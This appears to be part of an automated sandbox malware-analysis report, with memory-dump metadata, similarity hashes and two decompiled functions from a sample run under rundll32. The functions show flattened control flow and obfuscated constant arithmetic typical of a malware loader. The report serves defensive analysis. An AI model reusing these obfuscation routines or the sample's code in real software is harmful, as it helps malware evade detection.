                                                                                                                                    0x002cd6c7
                                                                                                                                    0x002cd6c7
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: $qb+$rg'$uwjP$za%$M
                                                                                                                                    • API String ID: 0-3591755710
                                                                                                                                    • Opcode ID: da7435b32c5398bb183d40738941ae657b2ab1072f7b303e1b7fc0a3233c1fa4
                                                                                                                                    • Instruction ID: 057d2a9abb39367cef2c0c80d8cfab12bd15267e6502e44b4b58251b45e74e9f
                                                                                                                                    • Opcode Fuzzy Hash: da7435b32c5398bb183d40738941ae657b2ab1072f7b303e1b7fc0a3233c1fa4
                                                                                                                                    • Instruction Fuzzy Hash: FC1232715183818FD368CF25C486A5BFBF1FBC4348F608A1DF69A86261D7B19954CF42
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002D907F Relevance: 7.8, Strings: 6, Instructions: 261COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                    			E002D907F(intOrPtr* __ecx) {
				intOrPtr* _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				unsigned int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				void* _t284;
				void* _t285;
				intOrPtr _t286;
				void* _t293;
				void* _t301;
				signed int _t304;
				signed int _t305;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				void* _t311;
				intOrPtr* _t343;
				void* _t347;
				signed int* _t348;

				_t348 =  &_v132;
				_t343 = __ecx;
				_v4 = __ecx;
				_v40 = 0x7c806d;
				_v40 = _v40 + 0x9e80;
				_v40 = _v40 ^ 0x007d1eed;
				_v12 = 0xea5ac0;
				_v12 = _v12 + 0xffff451e;
				_v12 = _v12 ^ 0x00e99fde;
				_v24 = 0xace3a9;
				_t347 = 0;
				_t304 = 0xa;
				_v24 = _v24 / _t304;
				_v24 = _v24 ^ 0x001149f7;
				_t301 = 0x97dfe60;
				_v112 = 0x63471f;
				_v112 = _v112 ^ 0x706c6b64;
				_v112 = _v112 | 0x0d4cecae;
				_v112 = _v112 << 3;
				_v112 = _v112 ^ 0xea7f67f8;
				_v28 = 0x68a2fc;
				_t305 = 0x5b;
				_v28 = _v28 * 0x1c;
				_v28 = _v28 ^ 0x0b71d390;
				_v84 = 0x508d02;
				_v84 = _v84 | 0x7bfb7ba7;
				_v84 = _v84 ^ 0x7bffa5e3;
				_v124 = 0xc0d8a4;
				_v124 = _v124 + 0xffffd7c7;
				_v124 = _v124 ^ 0xdba96bec;
				_v124 = _v124 + 0xffffcd63;
				_v124 = _v124 ^ 0xdb66cc39;
				_v116 = 0xc7a01f;
				_v116 = _v116 * 0x50;
				_v116 = _v116 << 7;
				_v116 = _v116 + 0x525d;
				_v116 = _v116 ^ 0x3100192e;
				_v88 = 0x173e76;
				_v88 = _v88 / _t305;
				_v88 = _v88 + 0xcdb8;
				_v88 = _v88 ^ 0x00098d3b;
				_v48 = 0x3a45de;
				_t306 = 0x3d;
				_v48 = _v48 / _t306;
				_v48 = _v48 ^ 0x0006d702;
				_v52 = 0xd8d0f7;
				_v52 = _v52 | 0xabcf1793;
				_v52 = _v52 + 0xffff6a1e;
				_v52 = _v52 ^ 0xabd8e28c;
				_v64 = 0xff5420;
				_v64 = _v64 >> 9;
				_v64 = _v64 + 0xffff2626;
				_v64 = _v64 ^ 0xfff0768b;
				_v80 = 0x65116e;
				_v80 = _v80 >> 9;
				_v80 = _v80 | 0xde6750c8;
				_v80 = _v80 ^ 0xde6208e1;
				_v56 = 0x2d6903;
				_v56 = _v56 >> 0xc;
				_v56 = _v56 + 0xffff4c70;
				_v56 = _v56 ^ 0xfff58c10;
				_v132 = 0xe5be5a;
				_v132 = _v132 + 0xfffffbec;
				_v132 = _v132 << 3;
				_v132 = _v132 ^ 0x46ad3c03;
				_v132 = _v132 ^ 0x418237eb;
				_v108 = 0x3fa801;
				_v108 = _v108 + 0x902;
				_v108 = _v108 >> 7;
				_v108 = _v108 ^ 0x9ac0b97a;
				_v108 = _v108 ^ 0x9ac73a04;
				_v72 = 0x454e35;
				_v72 = _v72 + 0x4c9c;
				_t307 = 0x29;
				_v72 = _v72 / _t307;
				_v72 = _v72 ^ 0x000328df;
				_v32 = 0x46b9f;
				_v32 = _v32 >> 4;
				_v32 = _v32 ^ 0x0003d4b9;
				_v16 = 0xab007f;
				_v16 = _v16 ^ 0x56a4e801;
				_v16 = _v16 ^ 0x56002f48;
				_v100 = 0xb9d48c;
				_v100 = _v100 | 0xb434f54e;
				_v100 = _v100 >> 0x10;
				_v100 = _v100 ^ 0x000dcd0e;
				_v92 = 0x17070b;
				_t308 = 0x37;
				_v92 = _v92 / _t308;
				_v92 = _v92 << 7;
				_v92 = _v92 ^ 0x0038b56c;
				_v60 = 0xdb418a;
				_v60 = _v60 * 0x4d;
				_v60 = _v60 << 2;
				_v60 = _v60 ^ 0x07c52fa3;
				_v68 = 0x99d1b0;
				_v68 = _v68 << 1;
				_v68 = _v68 + 0xadc1;
				_v68 = _v68 ^ 0x01384a96;
				_v120 = 0xfb4a64;
				_v120 = _v120 | 0x92bfeeef;
				_v120 = _v120 + 0x1827;
				_v120 = _v120 >> 5;
				_v120 = _v120 ^ 0x0494323d;
				_v128 = 0xf75f57;
				_v128 = _v128 >> 4;
				_v128 = _v128 + 0xe158;
				_v128 = _v128 + 0xffff16ce;
				_v128 = _v128 ^ 0x000f9950;
				_v76 = 0xb94cf;
				_v76 = _v76 | 0xc911a6ab;
				_v76 = _v76 >> 2;
				_v76 = _v76 ^ 0x3240c46f;
				_v104 = 0x7ca07;
				_v104 = _v104 * 0x23;
				_v104 = _v104 >> 4;
				_v104 = _v104 ^ 0xe4d42587;
				_v104 = _v104 ^ 0xe4c14657;
				_v44 = 0x308a5a;
				_v44 = _v44 >> 0x10;
				_v44 = _v44 ^ 0x0006e55e;
				_v96 = 0x427aa5;
				_v96 = _v96 + 0xed3d;
				_v96 = _v96 + 0xffff13f4;
				_v96 = _v96 ^ 0x0046a078;
				_v20 = 0xf8f4;
				_v20 = _v20 * 0x4a;
				_t284 = 0x4469cd4;
				_v20 = _v20 ^ 0x004ab19f;
				_v36 = 0x7998ac;
				_v36 = _v36 >> 0xc;
				_v36 = _v36 ^ 0x0008cf6c;
				do {
					while(_t301 != _t284) {
						if(_t301 == 0x661bd7c) {
							E002C957D(_v8, _v96, _v20, _v28, _v36);
						} else {
							if(_t301 == 0x8cd68b1) {
								_push(_v116);
								_push(_v124);
								_t293 = E002DDCF7(_v84, 0x2c1954, __eflags);
								_push(_v52);
								_push(_v48);
								__eflags = E002C9462(_t293, _v80,  &_v8, E002DDCF7(_v88, 0x2c1814, __eflags), _v56, _v40) - _v12;
								_t301 =  ==  ? 0x4469cd4 : 0x94c729c;
								E002CA8B0(_v132, _t293, _v108);
								E002CA8B0(_v72, _t294, _v32);
								_t343 = _v4;
								L8:
								_t284 = 0x4469cd4;
								_t348 =  &(_t348[0xb]);
								goto L9;
							} else {
								if(_t301 != 0x97dfe60) {
									goto L9;
								} else {
									_t301 = 0x8cd68b1;
									continue;
								}
							}
						}
						L12:
						return _t347;
					}
					_push(_v92);
					_push(_v100);
					_t285 = E002DDCF7(_v16, 0x2c1854, __eflags);
					_pop(_t311);
					_t286 =  *0x2e3dfc; // 0x0
					__eflags = E002CAA4D(_v60, _t285,  *((intOrPtr*)(_t343 + 4)), _v120, _v24, _v8, _t286 + 0x40, _v128, _t311,  *_t343, _v76) - _v112;
					_t301 = 0x661bd7c;
					_t347 =  ==  ? 1 : _t347;
					E002CA8B0(_v104, _t285, _v44);
					goto L8;
					L9:
					__eflags = _t301 - 0x94c729c;
				} while (__eflags != 0);
				goto L12;
			}


















































                                                                                                                                    0x002d907f
                                                                                                                                    0x002d9089
                                                                                                                                    0x002d908b
                                                                                                                                    0x002d9092
                                                                                                                                    0x002d909c
                                                                                                                                    0x002d90a4
                                                                                                                                    0x002d90ac
                                                                                                                                    0x002d90b7
                                                                                                                                    0x002d90c2
                                                                                                                                    0x002d90cd
                                                                                                                                    0x002d90db
                                                                                                                                    0x002d90dd
                                                                                                                                    0x002d90e2
                                                                                                                                    0x002d90eb
                                                                                                                                    0x002d90f6
                                                                                                                                    0x002d90fb
                                                                                                                                    0x002d9103
                                                                                                                                    0x002d910b
                                                                                                                                    0x002d9113
                                                                                                                                    0x002d9118
                                                                                                                                    0x002d9120
                                                                                                                                    0x002d912d
                                                                                                                                    0x002d9130
                                                                                                                                    0x002d9134
                                                                                                                                    0x002d913c
                                                                                                                                    0x002d9144
                                                                                                                                    0x002d914c
                                                                                                                                    0x002d9154
                                                                                                                                    0x002d915c
                                                                                                                                    0x002d9164
                                                                                                                                    0x002d916c
                                                                                                                                    0x002d9174
                                                                                                                                    0x002d917c
                                                                                                                                    0x002d9189
                                                                                                                                    0x002d918d
                                                                                                                                    0x002d9192
                                                                                                                                    0x002d919a
                                                                                                                                    0x002d91a2
                                                                                                                                    0x002d91b2
                                                                                                                                    0x002d91b6
                                                                                                                                    0x002d91be
                                                                                                                                    0x002d91c6
                                                                                                                                    0x002d91d2
                                                                                                                                    0x002d91d5
                                                                                                                                    0x002d91d9
                                                                                                                                    0x002d91e1
                                                                                                                                    0x002d91e9
                                                                                                                                    0x002d91f1
                                                                                                                                    0x002d91f9
                                                                                                                                    0x002d9201
                                                                                                                                    0x002d9209
                                                                                                                                    0x002d920e
                                                                                                                                    0x002d9216
                                                                                                                                    0x002d921e
                                                                                                                                    0x002d9226
                                                                                                                                    0x002d922b
                                                                                                                                    0x002d9233
                                                                                                                                    0x002d923b
                                                                                                                                    0x002d9243
                                                                                                                                    0x002d9248
                                                                                                                                    0x002d9250
                                                                                                                                    0x002d9258
                                                                                                                                    0x002d9260
                                                                                                                                    0x002d9268
                                                                                                                                    0x002d926d
                                                                                                                                    0x002d9277
                                                                                                                                    0x002d927f
                                                                                                                                    0x002d9287
                                                                                                                                    0x002d928f
                                                                                                                                    0x002d9294
                                                                                                                                    0x002d929c
                                                                                                                                    0x002d92a4
                                                                                                                                    0x002d92ac
                                                                                                                                    0x002d92ba
                                                                                                                                    0x002d92bf
                                                                                                                                    0x002d92c5
                                                                                                                                    0x002d92cd
                                                                                                                                    0x002d92d5
                                                                                                                                    0x002d92da
                                                                                                                                    0x002d92e2
                                                                                                                                    0x002d92ed
                                                                                                                                    0x002d92f8
                                                                                                                                    0x002d9303
                                                                                                                                    0x002d930b
                                                                                                                                    0x002d9313
                                                                                                                                    0x002d9318
                                                                                                                                    0x002d9320
                                                                                                                                    0x002d932c
                                                                                                                                    0x002d932f
                                                                                                                                    0x002d9333
                                                                                                                                    0x002d9338
                                                                                                                                    0x002d9340
                                                                                                                                    0x002d934d
                                                                                                                                    0x002d9351
                                                                                                                                    0x002d9356
                                                                                                                                    0x002d935e
                                                                                                                                    0x002d9366
                                                                                                                                    0x002d936a
                                                                                                                                    0x002d9372
                                                                                                                                    0x002d937a
                                                                                                                                    0x002d9382
                                                                                                                                    0x002d938a
                                                                                                                                    0x002d9392
                                                                                                                                    0x002d9397
                                                                                                                                    0x002d939f
                                                                                                                                    0x002d93a7
                                                                                                                                    0x002d93ac
                                                                                                                                    0x002d93b4
                                                                                                                                    0x002d93bc
                                                                                                                                    0x002d93c4
                                                                                                                                    0x002d93cc
                                                                                                                                    0x002d93d4
                                                                                                                                    0x002d93d9
                                                                                                                                    0x002d93e1
                                                                                                                                    0x002d93ee
                                                                                                                                    0x002d93f2
                                                                                                                                    0x002d93f7
                                                                                                                                    0x002d93ff
                                                                                                                                    0x002d9407
                                                                                                                                    0x002d940f
                                                                                                                                    0x002d9414
                                                                                                                                    0x002d941c
                                                                                                                                    0x002d9424
                                                                                                                                    0x002d942c
                                                                                                                                    0x002d9434
                                                                                                                                    0x002d943c
                                                                                                                                    0x002d944f
                                                                                                                                    0x002d9456
                                                                                                                                    0x002d945b
                                                                                                                                    0x002d9466
                                                                                                                                    0x002d946e
                                                                                                                                    0x002d9473
                                                                                                                                    0x002d947b
                                                                                                                                    0x002d947b
                                                                                                                                    0x002d9489
                                                                                                                                    0x002d95e5
                                                                                                                                    0x002d948f
                                                                                                                                    0x002d9495
                                                                                                                                    0x002d94aa
                                                                                                                                    0x002d94b3
                                                                                                                                    0x002d94bb
                                                                                                                                    0x002d94c0
                                                                                                                                    0x002d94cb
                                                                                                                                    0x002d950e
                                                                                                                                    0x002d9519
                                                                                                                                    0x002d951c
                                                                                                                                    0x002d952e
                                                                                                                                    0x002d9533
                                                                                                                                    0x002d95b5
                                                                                                                                    0x002d95b5
                                                                                                                                    0x002d95ba
                                                                                                                                    0x00000000
                                                                                                                                    0x002d9497
                                                                                                                                    0x002d949d
                                                                                                                                    0x00000000
                                                                                                                                    0x002d94a3
                                                                                                                                    0x002d94a3
                                                                                                                                    0x00000000
                                                                                                                                    0x002d94a3
                                                                                                                                    0x002d949d
                                                                                                                                    0x002d9495
                                                                                                                                    0x002d95ef
                                                                                                                                    0x002d95f9
                                                                                                                                    0x002d95f9
                                                                                                                                    0x002d953c
                                                                                                                                    0x002d9545
                                                                                                                                    0x002d9550
                                                                                                                                    0x002d9556
                                                                                                                                    0x002d9564
                                                                                                                                    0x002d95a0
                                                                                                                                    0x002d95a2
                                                                                                                                    0x002d95ab
                                                                                                                                    0x002d95b0
                                                                                                                                    0x00000000
                                                                                                                                    0x002d95bd
                                                                                                                                    0x002d95bd
                                                                                                                                    0x002d95bd
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 5NE$=$H/$X$]R$dklp
                                                                                                                                    • API String ID: 0-668800459
                                                                                                                                    • Opcode ID: 0220e5c308fca51d58f520b74efb20ee20802fcae03370b158f24f8aba46ff2d
                                                                                                                                    • Instruction ID: 2ebf3f27b04049e9337c25bc734bea15c3a37674c8ed173666c07c9cebb586d8
                                                                                                                                    • Opcode Fuzzy Hash: 0220e5c308fca51d58f520b74efb20ee20802fcae03370b158f24f8aba46ff2d
                                                                                                                                    • Instruction Fuzzy Hash: BCD11FB11097808FD369CF25C48A60BBBF1FBC4758F508A1DF1AA86260DBB58959CF43
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002E0F33 Relevance: 7.8, Strings: 6, Instructions: 260COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                    			E002E0F33() {
				signed int _t237;
				signed char _t246;
				signed short _t255;
				signed int _t262;
				signed char _t269;
				intOrPtr* _t292;
				signed short _t301;
				void* _t302;
				signed short _t306;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed short _t319;
				void* _t321;

				 *(_t321 + 0x20) = 0xee0abc;
				 *(_t321 + 0x20) =  *(_t321 + 0x20) | 0x247001dc;
				_t262 = 0x40ff1a8;
				 *(_t321 + 0x30) =  *(_t321 + 0x20) * 0xb;
				 *(_t321 + 0x30) =  *(_t321 + 0x30) ^ 0x96ee7e42;
				 *(_t321 + 0x14) = 0x97563a;
				 *(_t321 + 0x14) =  *(_t321 + 0x14) + 0xa3ba;
				 *(_t321 + 0x14) =  *(_t321 + 0x14) + 0x7434;
				_t309 = 0x68;
				 *(_t321 + 0x18) =  *(_t321 + 0x14) / _t309;
				 *(_t321 + 0x18) =  *(_t321 + 0x18) ^ 0x000fa3ad;
				 *(_t321 + 0x54) = 0x46dfd;
				_t310 = 0x22;
				 *(_t321 + 0x54) =  *(_t321 + 0x54) * 0x3f;
				 *(_t321 + 0x54) =  *(_t321 + 0x54) ^ 0x011c0bd3;
				 *(_t321 + 0x50) = 0x65d669;
				 *(_t321 + 0x50) =  *(_t321 + 0x50) >> 4;
				 *(_t321 + 0x50) =  *(_t321 + 0x50) ^ 0x0002663c;
				 *(_t321 + 0x1c) = 0xa5dab8;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) * 0x23;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) >> 2;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) << 0xd;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) ^ 0x67379b84;
				 *(_t321 + 0x58) = 0x508bac;
				 *(_t321 + 0x58) =  *(_t321 + 0x58) + 0x81b9;
				 *(_t321 + 0x58) =  *(_t321 + 0x58) ^ 0x005059a5;
				 *(_t321 + 0x38) = 0x6dc462;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) / _t310;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) | 0x03137037;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) ^ 0x03112268;
				 *(_t321 + 0x20) = 0x10f337;
				 *(_t321 + 0x20) =  *(_t321 + 0x20) << 0x10;
				_t311 = 0x7a;
				 *(_t321 + 0x1c) =  *(_t321 + 0x20) * 0x5e;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) >> 3;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) ^ 0x09c781ed;
				 *(_t321 + 0x28) = 0x5a8e56;
				 *(_t321 + 0x28) =  *(_t321 + 0x28) ^ 0x165ac6ba;
				 *(_t321 + 0x28) =  *(_t321 + 0x28) / _t311;
				 *(_t321 + 0x28) =  *(_t321 + 0x28) >> 6;
				 *(_t321 + 0x28) =  *(_t321 + 0x28) ^ 0x000470dc;
				 *(_t321 + 0x40) = 0x558325;
				 *(_t321 + 0x40) =  *(_t321 + 0x40) | 0xb8e268f7;
				 *(_t321 + 0x40) =  *(_t321 + 0x40) + 0x4ee7;
				 *(_t321 + 0x40) =  *(_t321 + 0x40) ^ 0xb8f7e628;
				 *(_t321 + 0x3c) = 0x76576d;
				 *(_t321 + 0x3c) =  *(_t321 + 0x3c) << 1;
				 *(_t321 + 0x3c) =  *(_t321 + 0x3c) + 0xffff05d8;
				 *(_t321 + 0x3c) =  *(_t321 + 0x3c) ^ 0x00efc885;
				 *(_t321 + 0x38) = 0x7fcfc;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) >> 4;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) * 0x1e;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) ^ 0x0005448a;
				 *(_t321 + 0x58) = 0x685aea;
				 *(_t321 + 0x58) =  *(_t321 + 0x58) | 0x7e49cfb4;
				 *(_t321 + 0x58) =  *(_t321 + 0x58) ^ 0x7e6c4597;
				 *(_t321 + 0x24) = 0x2cb25b;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) | 0x98b89101;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) + 0x99b1;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) << 5;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) ^ 0x17a3ab17;
				 *(_t321 + 0x20) = 0x5c4f5f;
				_t312 = 0x75;
				_t306 =  *(_t321 + 0x70);
				 *(_t321 + 0x24) =  *(_t321 + 0x20) * 0x3b;
				_t319 =  *(_t321 + 0x70);
				 *(_t321 + 0x24) =  *(_t321 + 0x24) / _t312;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) ^ 0x3b5669b3;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) ^ 0x3b72ed3d;
				 *(_t321 + 0x48) = 0x281dd4;
				 *(_t321 + 0x48) =  *(_t321 + 0x48) >> 8;
				 *(_t321 + 0x48) =  *(_t321 + 0x48) + 0xfffffe89;
				 *(_t321 + 0x48) =  *(_t321 + 0x48) ^ 0x000ef8bb;
				 *(_t321 + 0x60) = 0x5ec984;
				 *(_t321 + 0x60) =  *(_t321 + 0x60) + 0xefe6;
				 *(_t321 + 0x60) =  *(_t321 + 0x60) ^ 0x00516114;
				 *(_t321 + 0x4c) = 0xbf15d9;
				_t313 = 0x6c;
				 *(_t321 + 0x4c) =  *(_t321 + 0x4c) / _t313;
				_t314 = 0x6b;
				 *(_t321 + 0x4c) =  *(_t321 + 0x4c) / _t314;
				 *(_t321 + 0x4c) =  *(_t321 + 0x4c) ^ 0x000706ff;
				 *(_t321 + 0x30) = 0x4468c3;
				_t315 = 0x7e;
				 *(_t321 + 0x2c) =  *(_t321 + 0x30) * 0x39;
				 *(_t321 + 0x2c) =  *(_t321 + 0x2c) / _t315;
				 *(_t321 + 0x2c) =  *(_t321 + 0x2c) * 0x49;
				 *(_t321 + 0x2c) =  *(_t321 + 0x2c) ^ 0x08d90aee;
				while(1) {
					L1:
					_t292 =  *0x2e3e08; // 0x0
					while(1) {
						L2:
						_t237 =  *(_t321 + 0x60);
						L3:
						while(_t262 != 0x160fcc4) {
							if(_t262 == 0x26954f0) {
								 *_t237 = _t319;
								_t262 = 0xfeff895;
								 *_t292 =  *_t292 + 1;
								_t237 = _t319;
								 *(_t321 + 0x60) = _t237;
								continue;
							} else {
								if(_t262 == 0x40ff1a8) {
									_t179 = _t292 + 0x20; // 0x20
									_t237 = _t179;
									_t262 = 0x5ead19b;
									 *(_t321 + 0x60) = _t237;
									continue;
								} else {
									if(_t262 == 0x58e8483) {
										_push(_t262);
										_push(_t262);
										_t302 = 0x40;
										_t319 = E002C7FF2(_t302);
										__eflags = _t319;
										if(__eflags == 0) {
											goto L20;
										} else {
											_t262 = 0x160fcc4;
											goto L1;
										}
									} else {
										if(_t262 == 0x5ead19b) {
											_t255 = E002D7BA6(_t321 + 0x6c,  *(_t321 + 0x38), __eflags,  *(_t321 + 0x18), 0x2e3000);
											 *(_t321 + 0x70) = _t255;
											_t306 = _t255;
											 *((intOrPtr*)(_t321 + 0x68)) = _t255 +  *((intOrPtr*)(_t321 + 0x68));
											_t262 = 0x58e8483;
											while(1) {
												L1:
												_t292 =  *0x2e3e08; // 0x0
												goto L2;
											}
										} else {
											if(_t262 == 0xd41016e) {
												E002D8519( *(_t321 + 0x4c),  *(_t321 + 0x2c),  *((intOrPtr*)(_t321 + 0x6c)));
												L20:
												_t292 =  *0x2e3e08; // 0x0
											} else {
												if(_t262 != 0xfeff895) {
													L17:
													__eflags = _t262 - 0x20f61b3;
													if(__eflags != 0) {
														L2:
														_t237 =  *(_t321 + 0x60);
														continue;
													}
												} else {
													asm("sbb ecx, ecx");
													_t262 = (_t262 & 0xf84d8315) + 0xd41016e;
													continue;
												}
											}
										}
									}
								}
							}
							 *(_t292 + 0x14) =  *(_t292 + 0x14) & 0x00000000;
							 *((intOrPtr*)(_t292 + 4)) =  *(_t292 + 0x20);
							__eflags = 1;
							return 1;
						}
						_push( *(_t321 + 0x1c));
						_push( *(_t321 + 0x38));
						 *((char*)(_t321 + 0x1b)) =  *((intOrPtr*)(_t306 + 1));
						 *((char*)(_t321 + 0x1a)) =  *((intOrPtr*)(_t306 + 2));
						E002D1652( *(_t321 + 0x70), __eflags,  *(_t321 + 0x47) & 0x000000ff,  *(_t321 + 0x26) & 0x000000ff,  *((intOrPtr*)(_t321 + 0x68)),  *(_t321 + 0x60), E002DDCF7( *((intOrPtr*)(_t321 + 0x5c)), 0x2c1590, __eflags), 0x10, _t319 + 0x1c,  *(_t321 + 0x70),  *(_t306 + 3) & 0x000000ff,  *((intOrPtr*)(_t321 + 0x34)),  *(_t306 + 3) & 0x000000ff,  *(_t321 + 0x28));
						E002CA8B0( *((intOrPtr*)(_t321 + 0x80)), _t240,  *((intOrPtr*)(_t321 + 0x94)));
						_t321 = _t321 + 0x3c;
						 *(_t319 + 0x1a) = ( *(_t306 + 4) & 0x000000ff) << 0x00000008 |  *(_t306 + 5) & 0x000000ff;
						_t246 =  *((intOrPtr*)(_t306 + 6));
						_t269 =  *((intOrPtr*)(_t306 + 7));
						_t306 = _t306 + 8;
						_t262 = 0x26954f0;
						_t301 = (_t246 & 0x000000ff) << 0x00000008 | _t269 & 0x000000ff;
						__eflags = _t301;
						 *(_t319 + 0x18) = _t301;
						_t292 =  *0x2e3e08; // 0x0
						goto L17;
					}
				}
			}





















                                                                                                                                    0x002e0f36
                                                                                                                                    0x002e0f40
                                                                                                                                    0x002e0f48
                                                                                                                                    0x002e0f56
                                                                                                                                    0x002e0f5a
                                                                                                                                    0x002e0f62
                                                                                                                                    0x002e0f6a
                                                                                                                                    0x002e0f72
                                                                                                                                    0x002e0f80
                                                                                                                                    0x002e0f85
                                                                                                                                    0x002e0f8b
                                                                                                                                    0x002e0f93
                                                                                                                                    0x002e0fa0
                                                                                                                                    0x002e0fa3
                                                                                                                                    0x002e0fa7
                                                                                                                                    0x002e0faf
                                                                                                                                    0x002e0fb7
                                                                                                                                    0x002e0fbc
                                                                                                                                    0x002e0fc4
                                                                                                                                    0x002e0fd1
                                                                                                                                    0x002e0fd5
                                                                                                                                    0x002e0fda
                                                                                                                                    0x002e0fdf
                                                                                                                                    0x002e0fe7
                                                                                                                                    0x002e0fef
                                                                                                                                    0x002e0ff7
                                                                                                                                    0x002e0fff
                                                                                                                                    0x002e100f
                                                                                                                                    0x002e1013
                                                                                                                                    0x002e101b
                                                                                                                                    0x002e1023
                                                                                                                                    0x002e102b
                                                                                                                                    0x002e1035
                                                                                                                                    0x002e1036
                                                                                                                                    0x002e103a
                                                                                                                                    0x002e103f
                                                                                                                                    0x002e1047
                                                                                                                                    0x002e104f
                                                                                                                                    0x002e105d
                                                                                                                                    0x002e1061
                                                                                                                                    0x002e1066
                                                                                                                                    0x002e106e
                                                                                                                                    0x002e1076
                                                                                                                                    0x002e107e
                                                                                                                                    0x002e1086
                                                                                                                                    0x002e108e
                                                                                                                                    0x002e1096
                                                                                                                                    0x002e109a
                                                                                                                                    0x002e10a2
                                                                                                                                    0x002e10aa
                                                                                                                                    0x002e10b2
                                                                                                                                    0x002e10bc
                                                                                                                                    0x002e10c0
                                                                                                                                    0x002e10c8
                                                                                                                                    0x002e10d0
                                                                                                                                    0x002e10d8
                                                                                                                                    0x002e10e0
                                                                                                                                    0x002e10e8
                                                                                                                                    0x002e10f0
                                                                                                                                    0x002e10f8
                                                                                                                                    0x002e10fd
                                                                                                                                    0x002e1107
                                                                                                                                    0x002e1116
                                                                                                                                    0x002e1119
                                                                                                                                    0x002e111d
                                                                                                                                    0x002e1129
                                                                                                                                    0x002e112d
                                                                                                                                    0x002e1131
                                                                                                                                    0x002e1139
                                                                                                                                    0x002e1141
                                                                                                                                    0x002e1149
                                                                                                                                    0x002e114e
                                                                                                                                    0x002e1156
                                                                                                                                    0x002e115e
                                                                                                                                    0x002e1166
                                                                                                                                    0x002e116e
                                                                                                                                    0x002e1176
                                                                                                                                    0x002e1182
                                                                                                                                    0x002e1187
                                                                                                                                    0x002e1191
                                                                                                                                    0x002e1196
                                                                                                                                    0x002e119c
                                                                                                                                    0x002e11a4
                                                                                                                                    0x002e11b1
                                                                                                                                    0x002e11b2
                                                                                                                                    0x002e11bc
                                                                                                                                    0x002e11c5
                                                                                                                                    0x002e11c9
                                                                                                                                    0x002e11d1
                                                                                                                                    0x002e11d1
                                                                                                                                    0x002e11d1
                                                                                                                                    0x002e11d7
                                                                                                                                    0x002e11d7
                                                                                                                                    0x002e11d7
                                                                                                                                    0x00000000
                                                                                                                                    0x002e11db
                                                                                                                                    0x002e11ed
                                                                                                                                    0x002e12a8
                                                                                                                                    0x002e12aa
                                                                                                                                    0x002e12af
                                                                                                                                    0x002e12b1
                                                                                                                                    0x002e12b3
                                                                                                                                    0x00000000
                                                                                                                                    0x002e11f3
                                                                                                                                    0x002e11f9
                                                                                                                                    0x002e1297
                                                                                                                                    0x002e1297
                                                                                                                                    0x002e129a
                                                                                                                                    0x002e129f
                                                                                                                                    0x00000000
                                                                                                                                    0x002e11ff
                                                                                                                                    0x002e1205
                                                                                                                                    0x002e1277
                                                                                                                                    0x002e1278
                                                                                                                                    0x002e127b
                                                                                                                                    0x002e1281
                                                                                                                                    0x002e1285
                                                                                                                                    0x002e1287
                                                                                                                                    0x00000000
                                                                                                                                    0x002e128d
                                                                                                                                    0x002e128d
                                                                                                                                    0x00000000
                                                                                                                                    0x002e128d
                                                                                                                                    0x002e1207
                                                                                                                                    0x002e120d
                                                                                                                                    0x002e124c
